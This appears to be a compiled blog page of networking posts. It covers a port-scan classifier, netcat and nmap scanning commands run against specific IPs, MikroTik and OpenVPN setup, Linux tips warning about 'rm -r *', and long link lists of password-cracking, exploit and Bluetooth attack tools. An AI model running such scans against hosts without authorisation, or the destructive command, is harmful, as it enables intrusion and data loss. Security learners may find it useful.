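    sport, dport, _seq, _ack, _offset, flags = struct.unpack("!HHLLBB", header[:14])
    return sport, dport, flags & 0x3F  # ignore the ECN bits


def classify_sources(packets, min_ports=3):
    """Map each source IP to the probe types it sent to >= min_ports targets.

    packets: iterable of (src_ip, dst_ip, tcp_header_bytes) seen inbound.
    Counting distinct (host, port) pairs keeps ordinary traffic to one
    service from being reported.
    """
    targets = defaultdict(set)
    for src, dst, header in packets:
        _sport, dport, flags = parse_flags(header)
        label = PROBE_TYPES.get(flags)
        if label is not None:
            targets[(src, label)].add((dst, dport))
    report = defaultdict(list)
    for (src, label), ports in sorted(targets.items()):
        if len(ports) >= min_ports:
            report[src].append(label)
    return dict(report)


# Constructed capture: two scanners and one ordinary client.
SAMPLE_PACKETS = (
    [("203.0.113.5", "192.0.2.10", tcp_header(40000, p, FIN | PSH | URG))
     for p in (21, 22, 23, 25)]
    + [("203.0.113.9", "192.0.2.10", tcp_header(40001, p, 0)) for p in (1, 2, 3)]
    + [("198.51.100.20", "192.0.2.10", tcp_header(51000, p, SYN)) for p in (80, 443)]
)

if __name__ == "__main__":
    for source, labels in classify_sources(SAMPLE_PACKETS).items():
        print(source, "->", ", ".join(labels))
```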

We will now discuss some of the more popular and time-proven port scanners.

Strobe

Download it from ftp://ftp.rpmfind.net/linux/redhat/7.1/en/powertools/i386/RedHat/RPMS/strobe-1.04-8.i386.rpm

It is one of the fastest and most reliable TCP scanners, and it can also grab the banner associated with a particular port. Strobe is a TCP-only scanner and provides no UDP scanning capability, and it can be easily detected by the target machine.

[root@ns2 files]# strobe 213.206.75.252
strobe 1.04 (c) 1995-1997 Julian Assange (proff@suburbia.net).
213.206.75.252 21 ftp File Transfer [Control] [96,JBP]
-> 220-FTP server ready.
-> 220 Only anonymous FTP is allowed here
213.206.75.252 80 http www www-http World Wide Web HTTP
www World Wide Web HTTP [TXL]
[root@ns2 files]#

For a UDP port scanner, try udp_scan from SATAN (Security Administrator Tool for Analyzing Networks).

Netcat


This is known as the Swiss army knife of the security toolkit. It provides both TCP and UDP scanning capabilities. The -v and -vv options give verbose output, the -z option is used for port scanning, and the -w2 option sets a timeout value for each connection. By default nc uses TCP ports; the -u option is used to specify UDP scanning.

[root@ns2 files]# nc -v -z -w2 203.122.61.154 1-140
ns2.spectra.com [203.122.61.154] 111 (sunrpc) open
ns2.spectra.com [203.122.61.154] 80 (http) open
ns2.spectra.com [203.122.61.154] 53 (domain) open
ns2.spectra.com [203.122.61.154] 23 (telnet) : No route to host
[root@ns2 files]#

[root@ns2 files]# nc -u -v -z -w2 203.122.61.154 1-140
ns2.spectranet.com [203.122.61.154] 132 (?) open
ns2.spectranet.com [203.122.61.154] 131 (?) open
ns2.spectranet.com [203.122.61.154] 130 (?) open
ns2.spectranet.com [203.122.61.154] 129 (?) open
ns2.spectranet.com [203.122.61.154] 128 (?) open
ns2.spectranet.com [203.122.61.154] 127 (?) open
ns2.spectranet.com [203.122.61.154] 126 (?) open
punt!
[root@ns2 files]#

Network Mapper (nmap)

Nmap from http://www.insecure.org/nmap is an all-in-one tool. To see the list of available options use

[root@ns2 files]# nmap -h

[root@ns2 files]# nmap -sP 192.168.0.172

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Host ns2.krishna.com (192.168.0.172) appears to be up.
Nmap run completed -- 1 IP address (1 host up) scanned in 3 seconds
[root@ns2 files]#

Nmap allows you to enter ranges in CIDR (Classless Inter-Domain Routing) block notation. The -oN option saves the output in a human-readable format; use -oM to save it in a tab-delimited file.

[root@ns2 files]# nmap -sF 203.122.58.0/24 -oN outfile

Windows based port scanners


NetScanTools Pro 2000 http://www.nwpsw.com
SuperScan http://www.foundstone.com/rdlabs/termsofuse.php?filename=superscan.exe
WinScan: http://www.prosolve.com
IpEye http://www.ntsecurity.com
NetCat http://www.atstake.com/research/tools/nc11nt.zip
WUPS http://www.ntsecurity.nu
Fscan http://www.foundstone.com/rdlabs/termsofuse.php?filename=fscan.exe

Thanks Bro ...
Krishna
http://www.KrisinDigitalAge.com

Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit

http://www.secumania.org/exploits/remote/cisco-ios-12_x_11_x-http-remote-integer-overflow-exploit%0D%0A-2003081030210/

How to make a HotSpot gateway

The MikroTik HotSpot Gateway enables providing of public network access for clients using wireless or wired network connections. HotSpot Gateway should have at least two network interfaces:

1. HotSpot interface, which is used to connect HotSpot clients

2. LAN/WAN interface, which is used to access network resources.

The following picture shows wireless HotSpot setup



To set up a simple HotSpot Gateway, follow the steps below:

1. Configure wireless interface on HotSpot Gateway:
[admin@HotSpot_Gateway]> interface wireless set wlan1 ssid=HotSpot band=2.4ghz-b \
\... mode=ap-bridge

2. Configure ip address for HotSpot interface:
[admin@HotSpot_Gateway] > ip add add address=192.168.0.1/24 interface=wlan1

3. Configure ip address for WAN/LAN interface:
[admin@HotSpot_Gateway] > ip add add address=10.5.8.250/24 interface=ether1

4. Add a route on HotSpot Gateway
[admin@HotSpot_Gateway] > ip route add gateway=10.5.8.1

5. Configure Hotspot on wlan1 interface and add user admin with password test
[admin@MikroTik] > ip hotspot setup
hotspot interface: wlan1
local address of network: 192.168.0.1/24
masquerade network: yes
address pool of network: 192.168.0.2-192.168.0.254
select certificate: none
ip address of smtp server: 0.0.0.0
dns servers: 10.5.8.2
dns name: hs.example.net
name of local hotspot user: admin
password for the user: test

In order to access network resources HotSpot clients have to configure their wireless interfaces setting proper ssid, band and mode, and enabling dynamic host configuration (dhcp) on the wireless interface.

HTB-GEN: an easy way to manage bandwidth

Filed under: Mandriva - bayuart - yudha

Bandwidth management is usually implemented on the main-gw (main gateway), where the main-gw handles several clients that each have a fixed bandwidth allocation. Here we will use a helper tool called HTB-GEN.
On most Linux distros, htb/cbq is actually already included in the distro's default kernel; we are just not very familiar with the tc command, which is the standard tool for shaping bandwidth. That is why we use HTB-GEN here.
Things to remember:
License: GPLv2 or later
Requirements for running it:
-bash
-QoS htb kernel support
-iproute2 tc
-iptables
-htb-init script (optional)

OK, let's start implementing HTB-GEN on our main-gw machine. The steps are as follows:
Step 1: Download

- htb-gen-0.8.4.tar.gz Source tarball
- htb-gen_0.8.4_all.deb Debian package
- htb-gen-0.8.4-1.noarch.rpm Aliened RPM package

Archive at http://www.praga.org.ar/dev/htb-gen/packages/

Pick the one that matches the distro family you use; here I use Mandriva Cooker, so naturally I have to download the .rpm version.

Step 2: Install
To install htb-gen on Mandriva, just run the command
#urpmi htb-gen-0.8.4-1.noarch.rpm

Step 3: Configuration
Once the installation has completed successfully :) the standard htb-gen configuration files will be in the /etc/htb-gen directory.
Edit the file /etc/htb-gen/htb-gen.conf with your favourite editor :)

#vim /etc/htb-gen/htb-gen.conf

Note the following lines:

iface_down="eth1" # Server LAN iface
iface_up="eth0" # Server INET iface
total_rate_down=1024 #Total download bw
total_rate_up=512 #Total upload bw

Then, in the file /etc/htb-gen/htb-gen-rates.conf, note the following lines:

#              down    down    up      up
#              min     max     min     max
#ip            (rate)  (ceil)  (rate)  (ceil)
192.168.1.2    0       64      0       32
192.168.1.3    0       128     0       64
192.168.1.4    0       256     0       128
10.0.0.1/30    256     512     128     256
200.80.22.2    256     256     256     256

As you can see:

it is very easy to limit a host or a network

IPs on a different network can also be used

IP and network notation follows the standard rules

fixed-rate bandwidth is supported

a value of zero, or "0", means the available or remaining bandwidth is used automatically.

Next...

Step 4: Running it

Running htb-gen is very easy; in general, htb-gen can be run with the following option

#htb-gen tc_all

For more on the htb-gen options, check with the command

#htb-gen --help

The related official htb-gen site can be found at http://www.praga.org.ar/wacko/DevPraga/htbgen/

Installing OpenVPN Server + Shorewall

Source: linux.or.id

Why you need a VPN:
Q: Even while I am on the Internet outside the office's local network, I want to open applications (CRM, ERP) and local resources. How?
A: Hmm, a virtual local network (VPN), right?

VPN (Virtual Private Network): the expansion of the acronym pretty much conveys its function, namely a dedicated path (tunnel) for securing and sending data/information over a network or the Internet. From free software up to fairly expensive products embedded in hardware, such as Cisco, FortiNet and others, it is clear that this technology is still very much needed today. Isn't it? All right.

OpenVPN is a VPN software package licensed under the GNU GPL, and it is the one we will use. It uses the OpenSSL library to encrypt the data being transferred; in other words, the other OpenSSL cipher features (SHA1+DES, 3DES, RC4, AES) can be used as well. Oops, please look up the details yourself.

Shorewall is a helper tool for managing the filtering of incoming and outgoing packets, using iptables.

2. Installing OpenVPN
Linux distro used: CentOS; shorewall and openssl are running OK

$ sudo yum -y install openssl openvpn
{wait until it is 100% complete}

$ cp -r /usr/share/doc/openvpn/easy-rsa /etc/openvpn/
$ cd /etc/openvpn/easy-rsa
$ vim vars
[edit the vars file, adjust the parameters]
export D=`pwd`
export KEY_CONFIG=$D/openssl.cnf
export KEY=$D/keys
export KEY_SIZE=1024
export KEY_COUNTRY=ID
export KEY_PROVINCE=NS
export KEY_CITY=MEDAN
export KEY_ORG="Antar Media Network"
export KEY_EMAIL="deRegen@antarmedia.net"
export KEY_OU="RnD"
export KEY_COMMON="vpn.antarmedia.net"
--- end of file ---

$ source ./vars
$ ./build-ca
$ ./build-key-server amnet
$ ./build-key myclient1
$ ./build-key myclient2
$ ./build-dh

Once the key generation process is finished, prepare the required configuration file.

$ vim /etc/openvpn/amnet.conf
port 1194
dev tun
local dev.antarmedia.com
proto udp
verb 5
ca /etc/openvpn/easy-rsa/keys/ca.crt
cert /etc/openvpn/easy-rsa/keys/amnet.crt
key /etc/openvpn/easy-rsa/keys/amnet.key
dh /etc/openvpn/easy-rsa/keys/dh1024.pem
server 172.16.1.0 255.255.255.0
persist-key
persist-tun
status /etc/openvpn/openvpn-status.log
keepalive 10 120
comp-lzo
user nobody
group nobody
max-clients 10
cipher AES-128-CBC
--- end of file ---

$ chown -R nobody:nobody /etc/openvpn/
$ chown nobody:nobody /etc/openvpn/openvpn-status.log

3. Shorewall Configuration
$ vim /etc/shorewall/zones
vpn ipv4

$ vim /etc/shorewall/rules
ACCEPT loc $FW udp 1194
ACCEPT net $FW udp 1194
ACCEPT vpn loc tcp 25,80,110,3128
REDIRECT vpn 3128 tcp www - !172.16.1.0/24

$ vim /etc/shorewall/tunnels
openvpnserver:1194 net 0.0.0.0/0

$ vim /etc/shorewall/masq
eth0 tun0 72.232.21.251

Notes:
Keys should be generated separately for each client; this also results in a different IP allocation for each. Clients can use OpenVPN GUI (http://openvpn.se)

On Windows XP Professional SP 2, the OpenVPN configuration file is placed at (C:/Program Files/OpenVPN/config/myclient1.ovpn)

client
dev tun
proto udp
remote dev.antarmedia.com 1194
resolv-retry infinite
nobind
persist-key
persist-tun
pull
ca ca.crt
cert myclient1.crt
key myclient1.key
comp-lzo
verb 4
cipher AES-128-CBC
--- end of file ---

Clients connected through the VPN tunnel can still access websites and are monitored in the squid.log file. OpenVPN is installed on the machine that also serves as the firewall.
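
The server and client files above can be checked against settings that are considered weak by current practice. The following Python audit is an added example, not part of the original article or of OpenVPN: the finding names are invented here, the DH check is only a filename heuristic, and the hardened variant with its ta.key path is constructed for comparison.

```python
import re

# Server and client files as shown in the article.
SERVER_CONF = """\
port 1194
dev tun
local dev.antarmedia.com
proto udp
verb 5
ca /etc/openvpn/easy-rsa/keys/ca.crt
cert /etc/openvpn/easy-rsa/keys/amnet.crt
key /etc/openvpn/easy-rsa/keys/amnet.key
dh /etc/openvpn/easy-rsa/keys/dh1024.pem
server 172.16.1.0 255.255.255.0
persist-key
persist-tun
status /etc/openvpn/openvpn-status.log
keepalive 10 120
comp-lzo
user nobody
group nobody
max-clients 10
cipher AES-128-CBC
"""
CLIENT_CONF = """\
client
dev tun
proto udp
remote dev.antarmedia.com 1194
resolv-retry infinite
nobind
persist-key
persist-tun
pull
ca ca.crt
cert myclient1.crt
key myclient1.key
comp-lzo
verb 4
cipher AES-128-CBC
"""
# Constructed hardened variant; the ta.key path is a placeholder.
HARDENED_SERVER = (SERVER_CONF.replace("dh1024.pem", "dh2048.pem")
                   .replace("comp-lzo\n", "")
                   + "tls-auth /etc/openvpn/ta.key 0\n")
# Ciphers with a 64-bit block (Blowfish, DES/3DES, RC2, CAST5).
SMALL_BLOCK = re.compile(r"^(BF|DES|RC2|CAST5)-", re.I)


def directives(text):
    """Map directive name -> list of argument lists, skipping # and ; comments."""
    out = {}
    for raw in text.splitlines():
        line = re.split(r"[#;]", raw, maxsplit=1)[0].split()
        if line:
            out.setdefault(line[0], []).append(line[1:])
    return out


def audit(text):
    """Return sorted finding ids (names invented for this example)."""
    d, found = directives(text), set()
    is_client = "client" in d or "remote" in d
    for args in d.get("dh", []):
        m = re.search(r"dh(\d+)\.pem$", args[0]) if args else None
        if m and int(m.group(1)) < 2048:   # filename heuristic only
            found.add("dh-below-2048")
    if any(args != ["no"] for args in d.get("comp-lzo", [])):
        found.add("compression-enabled")
    if "tls-auth" not in d and "tls-crypt" not in d:
        found.add("no-tls-auth")
    if any(a and SMALL_BLOCK.match(a[0]) for a in d.get("cipher", [])):
        found.add("64-bit-block-cipher")
    if is_client and not d.keys() & {"remote-cert-tls", "ns-cert-type",
                                     "verify-x509-name"}:
        found.add("server-cert-not-checked")
    if not is_client and not ("user" in d and "group" in d):
        found.add("no-privilege-drop")
    return sorted(found)


def audit_vars(text):
    """Check the easy-rsa vars file for a key size below 2048 bits."""
    m = re.search(r"^export KEY_SIZE=(\d+)", text, re.M)
    return ["key-size-below-2048"] if m and int(m.group(1)) < 2048 else []


if __name__ == "__main__":
    for name, conf in (("server", SERVER_CONF), ("client", CLIENT_CONF),
                       ("hardened", HARDENED_SERVER)):
        print(name, audit(conf))
```

The client finding matters most in practice: without a server-certificate check, any certificate signed by the same CA, including another client's, is accepted as the server.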

Linux helps find files on a hard disk that got formatted

Lost your files?
That's your own fault...

Your HDD got formatted?
That's your carelessness...

So?
Don't be dumb....


Here, try this
For Linux users ..

http://jbj.rapanden.dk/magicrescue/release/magicrescue-1.1.5.tar.gz


Give it a try --
Yudha Dewantoro

Tips for New Linux Users

Tip 1:
On the problem of loading a Windows partition in Linux
[user@localhost]# mount /dev/hda1 -t vfat /mnt/win
And don't forget to unmount it before shutting down:
[hendr4@localhost]# umount /mnt/win

Tip 2:
Making a boot disk
[user@localhost]# mkbootdisk --device /dev/fd0 2.2.x-yy
where "2.2.x-yy" is the kernel version.
Want to know your kernel version? Easy..
just type "uname -a" in the console.

Tip 3:
If the X server crashes, just press the key combination [Ctrl+Alt+Bksp]; that will bring the system back to normal.

Tip 4:
You all surely know what "ls" does, but there is an alternative for the day "ls" doesn't work and your system has crashed. The answer is "echo".
Simple, right? echo gives us a list of files and folders just like "ls", but more powerful.
[user@localhost]$ echo *

Tip 5:
Deleting files whose names start with '-'
[user@localhost]$ echo something > -tmp
Try deleting the file '-tmp'..
[user@localhost]$ rm -tmp
rm: invalid option -- t
Coba rm --help untuk informasi lebih lanjut
[user@localhost]$
Whoa, it won't delete... take it easy, man
try '--'
[user@localhost]$ rm -- -tmp
[user@localhost]$ rm "./-tmp"
"./" means: look for the file '-tmp' in the current directory and delete it.
Crackers always create files like "-r *".
[user@localhost]$ echo hye >"-r *"
So if you find a file whose name starts with '-' and you want to delete it, don't be a fool who tries to delete it with the command "rm -r *" !!
Use the method above, because "rm -r *" will not delete just one file, it will delete all the files in the system !! Foolish, huh
[user@localhost]$ rm "./-r *"

Tip 6:
To find out the DNS, name server and mail server of a host
[user@ubuntu:/]$ dig www.linux.or.id


regards,
Ko /yd

Setting Up a Mikrotik Router for Speedy ADSL


First, let me sketch the network layout:

LAN --> Mikrotik RouterOS --> ADSL Modem --> INTERNET

For the LAN we use class C, with the network 192.168.0.0/24. For Mikrotik RouterOS we need two Ethernet cards: one (ether1 - 192.168.1.2/24) for the link to the ADSL modem and one more (ether2 - 192.168.0.1/24) for the link to the LAN. For the ADSL modem, we set the IP to 192.168.1.1/24.
Before typing anything, make sure you are at the root menu by typing "/"

Set the IP for each Ethernet card
ip address add address=192.168.1.2/24 interface=ether1
ip address add address=192.168.0.1/24 interface=ether2
To display the result of the commands above, type the following command:
ip address print
Then test by pinging the gateway or a computer on the LAN. If it succeeds, your IP configuration is correct
ping 192.168.1.1
ping 192.168.0.10

Adding the route
ip route add gateway=192.168.1.1

Setting DNS
ip dns set primary-dns=202.134.1.10 allow-remote-requests=yes
ip dns set secondary-dns=202.134.0.155 allow-remote-requests=yes
Because this connection uses Speedy from Telkom, the DNS servers I use are Telkom's. Adjust them to your own provider's DNS.
After that, try pinging yahoo.com, for example:
ping yahoo.com
If it succeeds, the DNS settings are correct

Source NAT (Network Address Translation) / Masquerading
So that all the computers on the LAN can also reach the Internet, you need to add NAT (masquerade) on the Mikrotik.
ip firewall nat add chain=srcnat action=masquerade out-interface=ether1
Now try pinging yahoo.com from a computer on the LAN
ping yahoo.com
If it succeeds, the masquerade setting is correct

DHCP (Dynamic Host Configuration Protocol)
For the sake of convenience, my friend wanted to use a DHCP server, so that whenever a client connects he doesn't have to set the IP manually. Just obtain it from the DHCP server and it's done. Luckily Mikrotik also has a DHCP server feature, so no problem..

Creating the IP address pool
ip pool add name=dhcp-pool ranges=192.168.0.2-192.168.0.254
Adding the DHCP network
ip dhcp-server network add address=192.168.0.0/24 gateway=192.168.0.1 dns-server=202.134.1.10,202.134.0.155
Adding the DHCP server
ip dhcp-server add name=DHCP_LAN disabled=no interface=ether2 address-pool=dhcp-pool
Now test from a client computer by requesting an IP address from the DHCP server. If it succeeds, then once again the settings are correct

Bandwidth Control
So that the client computers on the LAN do not fight each other for bandwidth, we need what is called bandwidth management or bandwidth control.
The model I use is queue trees. For a clearer explanation of what that is, please refer to the Mikrotik site.
The situation is as follows:
The Speedy connection is said to reach 384/64 Kbps (download/upload), but that is very rarely achieved. So we have to estimate the average. I take the minimum for download to be around 300 Kbps, and for upload I allocate 50 Kbps. As for the maximum, download is roughly 380 Kbps and upload 60 Kbps.
Then, there are currently 10 client computers. So that bandwidth has to be divided among those 10 clients.
The calculation for each client is as follows:
Minimum Download: 300 / 10 * 1024 = 30720 bps
Maximum Download: 380 / 10 * 1024 = 38912 bps
Minimum Upload: 50 / 10 * 1024 = 5120 bps
Maximum Upload: 60 / 10 * 1024 = 6144 bps
Next we start the configuration:
Mark all packets originating from the LAN
ip firewall mangle add src-address=192.168.0.0/24 action=mark-connection new-connection-mark=Clients-con chain=prerouting
ip firewall mangle add connection-mark=Clients-con action=mark-packet new-packet-mark=Clients chain=prerouting
Add the rules that will limit download and upload speed
queue tree add name=Clients-Download parent=ether2 packet-mark=Clients limit-at=30720 max-limit=38912
queue tree add name=Clients-Upload parent=ether1 packet-mark=Clients limit-at=5120 max-limit=6144
Now try a test download from several clients; each client should now be sharing the bandwidth. If fewer than 10 clients are online, the idle remaining bandwidth is distributed among the clients that are online.

Graphing
Mikrotik also comes with a traffic monitoring function, much like ordinary MRTG. So we can see how many packets pass through our Mikrotik PC.
tool graphing set store-every=5min
Next, what we will monitor are the packets passing through all the interfaces on our Mikrotik PC; on my computer these are ether1 and ether2.
tool graphing interface add-interface=all store-on-disk=yes
Now point your browser to the Mikrotik router's IP. In my case here:
http://192.168.0.1/graphs/
You will then get a choice of the interfaces on your router. Click one of them and you will see a graph of the packets passing through that interface.

From the tutorial above I only went as far as the step of adding NAT (masquerade). Because in my opinion DHCP is changeable by nature, so later when you want to limit the BW the IP is sometimes not the same. CMIIW. And for setting the limit I did it through remote winbox, which is easier. Now, a question for myself: when are you going to install the graph tool, kid? Hehehe... OK, hope it's all useful.
[donie kobain]

Tuesday, 11 March 2008

GFI LANguard Network Security Scanner 8

GFI LANguard Network Security Scanner is a tool to audit network security and proactively secure it. It scans entire networks from an attacker's perspective, and analyses machines for open ports, shares, security alerts/vulnerabilities, service pack level, installed hotfixes and other NETBIOS information such as hostname, logged on user name, users etc. It does OS detection, password strength testing and detects registry issues.

GFI LANguard N.S.S. is a complete patch management solution. After it has scanned your network and determined missing patches and service packs - both in the operating system (OS) and in the applications - you can use GFI LANguard N.S.S. to deploy those service packs and patches network-wide.

Key Features in GFI LANguard Network Security Scanner 8

In this Help Net Security video, Andre Muscat, the Director for the Development of Network Security Products at GFI discusses the key features in the latest release of the GFI LANguard Network Security Scanner.

Download :
http://www.net-security.org/dl/software/languardnss8.exe


yudhax

HACKING Wireless KeyView

WirelessKeyView recovers all wireless network keys (WEP/WPA) stored in your computer by the 'Wireless Zero Configuration' service of Windows XP and by the 'WLAN AutoConfig' service of Windows Vista. It allows you to easily save all keys to text/html/xml file, or copy a single key to the clipboard.

Download :
http://www.net-security.org/dl/software/wirelesskeyview.zip

Yudhax

Draft Hacking

Awareness and Training:

Awareity MOAT
www.awareity.com

Birch Systems Privacy Posters
www.privacyposters.com

Greenidea Visible Statement
www.greenidea.com

Interpact, Inc. Awareness Resources
www.thesecurityawarenesscompany.com

NIST resources
http://csrc.nist.gov/ATE

SANS Security Awareness Program
www.sans.org/awareness/awareness.php

Security Awareness, Inc. Awareness Resources
www.securityawareness.com

Bluetooth:

BlueScanner
www.networkchemistry.com/products/bluescanner.php

Bluesnarfer
www.alighieri.org/tools/bluesnarfer.tar.gz

BlueSniper rifle
www.tomsnetworking.com/2005/03/08/how_to_bluesniper_pt

Blooover
http://trifinite.org/trifinite_stuff_blooover.html

Bluejacking community site
www.bluejackq.com

Detailed presentation on the various Bluetooth attacks
http://trifinite.org/Downloads/21c3_Bluetooth_Hacking.pdf

NIST Special Publication 800-48
http://csrc.nist.gov/publications/nistpubs/800-48/NIST_SP_800-48.pdf

Certifications:

Certified Ethical Hacker
www.eccouncil.org/CEH.htm

Dictionary Files and Word Lists:

ftp://ftp.cerias.purdue.edu/pub/dict

ftp://ftp.ox.ac.uk/pub/wordlists

http://packetstormsecurity.nl/Crackers/wordlists

www.outpost9.com/files/WordLists.html

Default vendor passwords
www.cirt.net/cgi-bin/passwd.pl

Exploit Tools:

CORE IMPACT
www.coresecurity.com

Metasploit
www.metasploit.com/projects/Framework

General Research Tools:

AfriNIC
www.afrinic.net

APNIC
www.apnic.net

ARIN
www.arin.net/whois/index.html

CERT/CC Vulnerability Notes Database
www.kb.cert.org/vuls

ChoicePoint
www.choicepoint.com

Common Vulnerabilities and Exposures
http://cve.mitre.org/cve

DNSstuff.com
www.DNSstuff.com

Google
www.google.com

Government domains
www.dotgov.gov

Hoover's business information
www.hoovers.com

LACNIC
www.lacnic.net

Military domains
www.nic.mil/dodnic

NIST National Vulnerability Database
http://nvd.nist.gov

RIPE Network Coordination Centre
www.ripe.net/whois

Sam Spade
www.samspade.org

SecurityTracker
http://securitytracker.com

Switchboard.com
www.switchboard.com

U.S. Patent and Trademark Office
www.uspto.gov

U.S. Search.com
www.ussearch.com

U.S. Securities and Exchange Commission
www.sec.gov/edgar.shtml

Whois.org
www.whois.org

Yahoo! Finance site
http://finance.yahoo.com

Hacker Stuff:

2600 - The Hacker Quarterly magazine
www.2600.com

Blacklisted 411
www.blacklisted411.net

Computer Underground Digest
www.soci.niu.edu/~cudigest

Hacker T-shirts, equipment, and other trinkets
www.thinkgeek.com

Honeypots: Tracking Hackers
www.tracking-hackers.com

The Online Hacker Jargon File
www.jargon.8hz.com

PHRACK
www.phrack.org

Linux:

Amap
http://packages.debian.org/unstable/net/amap

Bastille Linux Hardening Program
www.bastille-linux.org

BackTrack
www.remote-exploit.org/index.php/BackTrack

Comprehensive listing of live bootable Linux toolkits
www.frozentech.com/content/livecd.php

Debian Linux Security Alerts
www.debian.org/security

Linux Administrator's Security Guide
www.seifried.org/lasg

Linux Kernel Updates
www.linuxhq.com

Linux Security Auditing Tool (LSAT)
http://usat.sourceforge.net

Metasploit
www.metasploit.com

Network Security Toolkit
www.networksecuritytoolkit.org

Red Hat Linux Security Alerts
www.redhat.com/securityupdates

Security Tools Distribution
http://s-t-d.org

Slackware Linux Security Advisories
www.slackware.com/security

SUSE Linux Security Alerts
www.suse.com/us/business/security.html

Tiger
ftp://ftp.debian.org/debian/pool/main/t/tiger

VLAD the Scanner
www.bindview.com/Services/RAZOR/Utilities/Unix_Linux/vlad.cfm

Log Analysis:

ArcSight Enterprise Security Manager
www.arcsight.com/product.htm

GFI LANguard Security Event Log Monitor
www.gfi.com/lanselm

Internet Security Systems Managed Services
www.iss.net/products_services/managed_services

LogAnalysis.org system logging resources
www.loganalysis.org

Malware:

chkrootkit
www.chkrootkit.org

EICAR Anti-Virus test file
www.eicar.org/anti_virus_test_file.htm

The File Extension Source
http://filext.com

McAfee AVERT Stinger
http://vil.nai.com/vil/stinger

Rkdet
http://vancouver-webpages.com/rkdet

Wotsit's Format
www.wotsit.org

Messaging:

Abuse.net SMTP relay checker
www.abuse.net/relay.html

Brutus
http://securitylab.ru/_tools/brutus-aet2.zip

Cain and Abel
www.oxid.it/cain.html

DNSstuff.com relay checker
www.dnsstuff.com

GFI e-mail security test
www.gfi.com/emailsecuritytest

How to disable SMTP relay on various e-mail servers
www.mail-abuse.com/an_sec3rdparty.html

mailsnarf
www.monkey.org/~dugsong/dsniff or
www.datanerds.net/~mike/dsniff.html for the Windows version

Sam Spade for Windows
www.samspade.org/ssw

smtpscan
www.greyhats.org/?smtpscan

NetWare:

Adrem Freecon
www.adremsoft.com

Craig Johnson's BorderManager resources
http://nscsysop.hypermart.net

JRB Software
www.jrbsoftware.com

NCPQuery
www.bindview.com/resources/razor/files/ncpquery-1.2.tar.gz

NetServerMon
www.simonsware.com/Products.shtml

Novell Product Updates
http://support.novell.com/filefinder

Pandora
www.nmrc.org/project/pandora

Rcon program
http://packetstormsecurity.nl/Netware/penetration/rcon.zip

Remote
www.securityfocus.com/data/vulnerabilities/exploits/Remote.zip

UserDump
www.hammerofgod.com/download/userdump.zip

Networks:

Cain and Abel
www.oxid.it/cain.html

CommView
www.tamos.com/products/commview

dsniff
www.monkey.org/~dugsong/dsniff

Essential NetTools
www.tamos.com/products/nettools

Ethereal network analyzer
www.ethereal.com

EtherPeek
www.wildpackets.com/products/etherpeek/overview

ettercap
http://ettercap.sourceforge.net

Firewalk
www.packetfactory.net/firewalk

Getif
www.wtcs.org/snmp4tpc/getif.htm

GFI LANguard Network Scanner
www.gfi.com/lannetscan

GNU MAC Changer
www.alobbs.com/macchanger

IETF RFCs
www.rfc-editor.org/rfcxx00.html

LanHound
www.sunbelt-software.com/LanHound.cfm

MAC address vendor lookup
http://standards.ieee.org/regauth/oui/index.shtml

Nessus vulnerability scanner
www.nessus.org

Netcat
www.vulnwatch.org/netcat/nc111nt.zip

NetScanTools Pro all-in-one network testing tool
www.netscantools.com

Nmap port scanner
www.insecure.org/nmap

NMapWin
http://sourceforge.net/projects/nmapwin

Port number listing
www.iana.org/assignments/port-numbers

Port number lookup
www.cotse.com/cgi-bin/port.cgi

QualysGuard vulnerability assessment tool
www.qualys.com

SNMPUTIL
www.wtcs.org/snmp4tpc/FILES/Tools/SNMPUTIL/SNMPUTIL.zip

Sunbelt Network Security Inspector
www.sunbelt-software.com/SunbeltNetworkSecurityInspector.cfm

SuperScan port scanner
www.foundstone.com/resources/proddesc/superscan.htm

TrafficIQ Pro
www.karalon.com

WhatIsMyIP
www.whatismyip.com

Password Cracking:

BIOS passwords
http://labmice.techtarget.com/articles/BIOS_hack.htm

Brutus
http://securitylab.ru/_tools/brutus-aet2.zip

Cain and Abel
www.oxid.it/cain.html

Chknull
www.phreak.org/archives/exploits/novell/chknull.zip

Crack
ftp://coast.cs.purdue.edu/pub/tools/unix/pwdutils/crack

Elcomsoft Distributed Password Recovery
www.elcomsoft.com/edpr.html

John the Ripper
www.openwall.com/john

Ophcrack
www.objectif-securite.ch/ophcrack

Proactive Password Auditor
www.elcomsoft.com/ppa.html

Proactive System Password Recovery
www.elcomsoft.com/pspr.html

pwdump3
www.openwall.com/passwords/dl/pwdump/pwdump3v2.zip

NetBIOS Auditing Tool
www.securityfocus.com/tools/543

NTAccess
www.mirider.com/ntaccess.html

RainbowCrack
www.antsight.com/zsl/rainbowcrack

RainbowCrack-Online
www.rainbowcrack-online.com

Rainbow tables
http://rainbowtables.shmoo.com

TSGrinder
www.hammerofgod.com/download/tsgrinder-2.03.zip

WinHex
www.winhex.com

Patch Management:

BigFix Enterprise Suite Patch Management
www.bigfix.com/products/patch.html

Ecora Patch Manager
www.ecora.com/ecora/products/patchmanager.asp

GFI LANguard Network Security Scanner
www.gfi.com/lannetscan

HFNetChkPro from Shavlik Technologies
www.shavlik.com/product_cat_patch_mang.aspx

Patch Authority Plus
www.scriptlogic.com/products/patchauthorityplus

PatchLink
www.patchlink.com

SysUpdate
www.securityprofiling.com

UpdateEXPERT from St. Bernard Software
www.stbernard.com/products/updateexpert/products_updateexpert.asp

Windows Server Update Services from Microsoft
www.microsoft.com/windowsserversystem/updateservices/default.mspx

Source Code Analysis:

Compuware
www.compuware.com/products/devpartner/securitychecker.htm

Fortify Software
www.fortifysoftware.com

Klocwork
www.klocwork.com

Ounce Labs
www.ouncelabs.com

SPI Dynamics
www.spidynamics.com/products/devinspect/index.html

Security Standards:

Center for Internet Security's Benchmarks/Scoring Tools
www.cisecurity.org

NIST Special Publications
http://csrc.nist.gov/publications/nistpubs/index.html

Open Source Security Testing Methodology Manual
www.isecom.org/osstmm

SANS Step-by-Step Guides
http://store.sans.org

Security Education:

Kevin Beaver's Security on Wheels podcasts and information security training resources
www.securityonwheels.com

Privacy Rights Clearinghouse's Chronology of Data Breaches Reported Since the ChoicePoint Incident
www.privacyrights.org/ar/ChronDataBreaches.htm

Storage:

CHAP Password Tester
www.isecpartners.com/tools.html#CPT

CIFSShareBF
www.isecpartners.com/SecuringStorage/CIFShareBF.zip

GrabiQNs
www.isecpartners.com/SecuringStorage/GrabiQNs.zip

NASanon
www.isecpartners.com/SecuringStorage/NASanon.zip

StorScan
www.isecpartners.com/tools.html#StorScan

Risk Analysis and Threat Modeling:

SecureITree
